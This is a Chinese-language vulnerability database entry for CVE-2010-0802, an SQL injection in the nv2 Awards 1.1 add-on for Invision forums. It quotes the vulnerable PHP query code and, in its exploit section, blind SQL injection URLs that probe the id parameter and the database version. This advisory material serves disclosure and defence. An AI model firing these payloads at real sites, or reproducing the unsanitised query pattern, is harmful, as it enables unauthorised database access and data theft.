Aleinbeen Awards 'index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118958 漏洞类型 SQL注入
发布时间 2010-01-30 更新时间 2010-01-30
CVE编号 CVE-2010-0802 CNNVD-ID CNNVD-201003-021
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/11297
https://www.securityfocus.com/bid/39019
https://cxsecurity.com/issue/WLB-2010020004
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201003-021
|漏洞详情
Awards(nv2)的脚本index.php存在SQL注入漏洞。远程攻击者可以借助查看(view)操作中的id参数,执行任意的SQL命令。
|漏洞EXP
#################################################
+
+  Author:      fred777 - [fred777.de]
+  Link:          http://forums.invisionize.com/nv2-Awards-120-t137847.html
+  Vuln:         index.php?autocom=awards&do=view&id=1
+  Greetzz to: Back2hack.cc
+  Contact:    nebelfrost77@googlemail.com
+
#################################################

--[ Vuln Code ] --

$this->ipsclass->DB->build_query( array( 'select' => 'a.user_id',
		                                           'from' => array( 'awarded' => 'a' ),
					  'where' => 'a.award_id=' . $this->ipsclass->input['id'],
					  'add_join' => array( 0 => array( 'select' => 'm.members_display_name',
					  'from' => array( 'members' => 'm' ),
						'where' => 'm.id=a.user_id',
						  'type' => 'left',
																				 ) ),
					  ) );

--------------------------------------------------------------------------------------

		'select' => '*',
		'from' => 'awards',
		'where' => 'id = "' . $_POST['award'] . '"',
		) );

--------------------------------------------------------------------------------------

	    $award_dat['user_id'] = $_GET['id'];
		$award_dat['award_id'] = $_POST['award'];

################################################

--[ Exploitable ]--

http://server/index.php?autocom=awards&do=view&id=1[SQL INJECTION]

http://server/index.php?autocom=awards&do=view&id=1+and+1=1 > true
http://server/index.php?autocom=awards&do=view&id=1+and+1=0 > false

http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=5
http://server/index.php?autocom=awards&do=view&id=1+and+substring(version(),1,1)=4

################################################
|受影响的产品
Invisionize (nv2) Awards 1.1
|参考资料

来源:MISC
链接:http://www.exploit-db.com/exploits/11297
来源:SECUNIA
名称:38407
链接:http://secunia.com/advisories/38407
来源:MISC
链接:http://packetstormsecurity.org/1001-exploits/ipbawards-sql.txt